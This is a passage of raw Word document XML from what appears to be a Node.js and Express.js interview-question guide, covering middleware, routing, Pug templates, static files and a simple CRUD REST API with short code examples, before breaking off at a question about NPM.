          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Middleware functions are the backbone of Express.js. They allow you to handle requests, responses, and implement additional features like logging, authentication, and error handling. Middleware can be used to manipulate the request and response objects, terminate the request-response cycle, or call the next middleware in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001CF0B6" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Express.js provides a powerful routing mechanism to handle HTTP requests (GET, POST, PUT, DELETE, etc.) with various URL paths. Routes can be defined in a flexible and scalable way, supporting route parameters, query strings, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B282B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Template Engines</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Express.js supports various template engines like Pug, EJS, and Handlebars, enabling you to generate HTML dynamically based on data passed to the templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B50E059" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Static Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Express.js makes it easy to serve static files such as images, CSS, and JavaScript files from a directory using built-in middleware like express.static.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB9FC2" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Express.js is widely used to build RESTful APIs, offering a simple way to define endpoints, handle different HTTP methods, and manage responses in JSON format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC9ED4" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>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 Express.js is designed to be scalable, allowing you to build applications ranging from small web services to large-scale enterprise systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0619AF50" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Creating an Express App</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: express() initializes the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22674557" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Middleware</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The app uses middleware to log each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBD3B3" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Routes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255639B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>app.get('/'): Defines a route for the root URL that responds with "Hello, World!".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DAE23D" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>app.get('/user/:name'): Defines a route with a dynamic URL parameter (:name) and responds with a personalized message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08260918" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Starting the Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: app.listen(port, callback) starts the server on the specified port, listening for incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36379A69"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Middleware in Express.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B8CEF"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Middleware functions in Express.js are functions that have access to the request (req), response (res), and the next middleware function in the application’s request-response cycle. Middleware can perform a variety of tasks, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA57AF" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Executing code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6892AA84" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modifying the request and response objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA470E7" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ending the request-response cycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C3DCA" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Calling the next middleware in the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B2921"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of Middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7289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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C121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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F379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74B4E5B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Custom middleware function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD5E24"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app.use((req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797181F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console.log('Middleware is executed!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294AAD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next(); // Pass control to the next handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BC61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7D9C1A9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68B57EA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app.get('/', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8BE7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res.send('Home Page');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140718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304F9FF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79B84D0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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6FC2E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console.log('Server is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095357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4731FC3D"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Routing in Express.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6855A"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Express.js allows you to define routes to handle different HTTP methods (GET, POST, PUT, DELETE) at specific URL paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656BBB2"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of Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DCCFD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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D82C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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2FF8A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D639E2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app.get('/', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7E6F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res.send('GET request to the homepage');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7724313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4280567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08193C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app.post('/submit', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E375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res.send('POST request to /submit');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6EEC5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4C6D7B4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F1E488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app.put('/update', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D21E30"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res.send('PUT request to /update');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DD16E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76C4018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87C0DB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app.delete('/delete', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A27C6C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  res.send('DELETE request to /delete');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301A63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0151A73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48843F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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA43EE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console.log('Server is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E505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522DEE87"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Template Engines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47249CB7"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Express.js supports various template engines to generate HTML on the server side based on data passed from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629CF2FE"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with Pug Template Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2D90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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DCB3F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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0DD1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625E13A4"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Set Pug as the template engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E24709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app.set('view engine', 'pug');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67002DE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CEE5AC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Define a route that renders a Pug template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D45E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app.get('/hello', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111099C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res.render('index', { title: 'Hello', message: 'Hello, World!' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8F4E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380770C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07E1A4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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2A7B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console.log('Server is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A867A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159E3609"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Serving Static Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BB71B"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You can serve static files such as images, CSS, and JavaScript files using the express.static middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC7DB9"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of Serving Static Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585EC76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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714BBAB"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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017075A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25D412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Serve static files from the 'public' directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A7B8B"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app.use(express.static('public'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782762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2FAF31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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D3D3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console.log('Server is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31F16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0D06930D"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Building RESTful APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504407CE"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Express.js is ideal for building RESTful APIs. You can define routes for various CRUD operations (Create, Read, Update, Delete) and handle requests and responses in JSON format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEC3882"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of a RESTful API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D607C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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4CFF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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAB71B"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7AF5D2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app.use(express.json()); // Middleware to parse JSON bodies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94780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3CE8C5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let items = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB1550"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69D75E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Create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C00E1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app.post('/items', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE9113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item = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4595A4"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items.push(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A6C54"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res.status(201).send(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A8B6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667229A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4B40F6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Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0D82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app.get('/items', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633177A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res.json(items);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC75A6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29E4892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F6F2FC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Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788DA7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app.put('/items/:id', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48327DD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id = parseInt(req.params.id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5411B2A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updatedItem = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FFE14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items = items.map(item =&gt; (item.id === id ? updatedItem : item));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472192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res.send(updatedItem);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B445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04B94AF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37CE620"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Delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79954D0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app.delete('/items/:id', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB861C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id = parseInt(req.params.id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8CDD1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items = items.filter(item =&gt; item.id !== id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0AEA04"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res.status(204).send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC05E6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lastRenderedPageBreak/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F3D75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299DB2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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A701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console.log('API is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23409B97" w14:textId="67197AFF"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0518C59E"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10" w:name="_Toc178383193"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q10. How do you install packages in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2261E67D"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11" w:name="_Toc178383194"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q11. What is NPM, and how does it work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0AD3E2A4" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NPM (Node Package Manager)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the default package manager for Node.js, and it's a critical tool in the Node.js ecosystem. It enables developers to share and reuse code, manage project dependencies, and automate tasks. NPM is also the world's largest software registry, hosting millions of open-source packages that can be easily integrated into Node.js projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAA743B" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Features of NPM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A06A7" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Package Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401DFB07" w14:textId="77777777" w:rsidR="001A55CF" w:rsidRPr="00DA2F32" w:rsidRDefault="001A55CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
